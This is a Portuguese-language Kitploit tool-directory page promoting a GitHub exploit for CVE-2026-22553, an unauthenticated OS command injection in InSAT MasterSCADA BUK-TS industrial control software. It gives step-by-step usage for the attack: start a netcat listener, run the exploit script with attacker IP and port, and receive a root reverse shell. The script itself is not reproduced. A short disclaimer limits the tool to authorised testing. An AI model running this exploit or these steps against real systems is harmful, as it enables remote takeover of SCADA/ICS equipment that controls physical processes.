Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ — Exploit de injeção de comandos do sistema operacional sem autenticação para a interface web InSAT MasterSCADA BUK-TS MMadmServ. Entrega shell reversa com privilégios de root via requisição HTTP POST. CVSS 9.8 crítico. | Kitploit
Ferramentas/GitHubGitHub/mbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv
Geração de PayloadsExploraçãoSegurança SCADA/ICSExploração de Aplicações WebTestes de PenetraçãoComando e Controle
GitHubmbanyamer/cve-2026-22553-insat-masterscada-buk-ts-mmadmserv

CVE-2026-22553-InSAT-MasterSCADA-BUK-TS-MMadmServ

Exploit de injeção de comandos do sistema operacional sem autenticação para a interface web InSAT MasterSCADA BUK-TS MMadmServ. Entrega shell reversa com privilégios de root via requisição HTTP POST. CVSS 9.8 crítico.

Ver Repositório
4há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-22553 Python License Author

InSAT MasterSCADA BUK-TS - RCE Não Autenticado

CVE-2026-22553 | CVSS 9.8 Crítico| Autor do Exploit: Mohammed Idrees Banyamer


📝 Descrição

O InSAT MasterSCADA BUK-TS sofre de uma vulnerabilidade de Injeção de Comandos no Sistema Operacional sem Autenticação na interface web MMadmServ. Essa falha permite que atacantes remotos obtenham execução remota de código (RCE) completa sem qualquer autenticação.

  • Produto Afetado: InSAT MasterSCADA BUK-TS (Todas as versões)
  • Tipo de Vulnerabilidade: Injeção de Comandos do SO (CWE-78)
  • Gravidade: Crítica (Pontuação CVSS v3.1: 9.8)
  • Autor do Exploit: Mohammed Idrees Banyamer
  • País: Jordânia 🇯🇴

  • 🛠️ Diagrama do Método de Ataque

    root@kitploit:~
    flowchart TD
        A[Attacker] -->|HTTP POST Request| B[MMadmServ Web Interface]
        B -->|Unauthenticated| C[Vulnerable Parameter]
        C -->|OS Command Injection| D[Command Execution on Target Server]
        D -->|Reverse Shell| E[Attacker's Listener\nnc -lvnp <port>]
        
        style A fill:#ff4d4d,stroke:#fff
        style E fill:#4dff88,stroke:#fff

    🚀 Uso

    root@kitploit:~
    python3 exploit.py <target_url> --lhost <your_ip> --lport <your_port>
    

    Exemplo

    root@kitploit:~
    python3 exploit.py http://192.168.1.50:8080 --lhost 192.168.1.100 --lport 4444
    

    Opções

    OpçãoDescrição
    targetURL alvo (ex.: http://ip:port)
    --lhostSeu endereço IP (reverse shell)
    --lportSua porta de escuta

    📌 Como Usar

    1. Inicie um listener na sua máquina:

      root@kitploit:~
      nc -lvnp 4444
      
    2. Execute o exploit:

      root@kitploit:~
      python3 exploit.py http://target-ip:port --lhost your-ip --lport 4444
      
    3. Obtenha um reverse shell com privilégios de root/sistema.


    ⚠️ Aviso Legal

    Este exploit é fornecido apenas para fins educacionais e de testes de penetração autorizados.
    O uso não autorizado contra sistemas que você não possui é ilegal e pode violar leis internacionais.
    O autor não é responsável por qualquer uso indevido.


    📬 Autor

    Mohammed Idrees Banyamer

    • Instagram: @banyamer_security
    • GitHub: mbanyamer
    • País: Jordânia 🇯🇴

    Deixe uma estrela ⭐ neste repositório se você o achou útil!

    Baixar ferramenta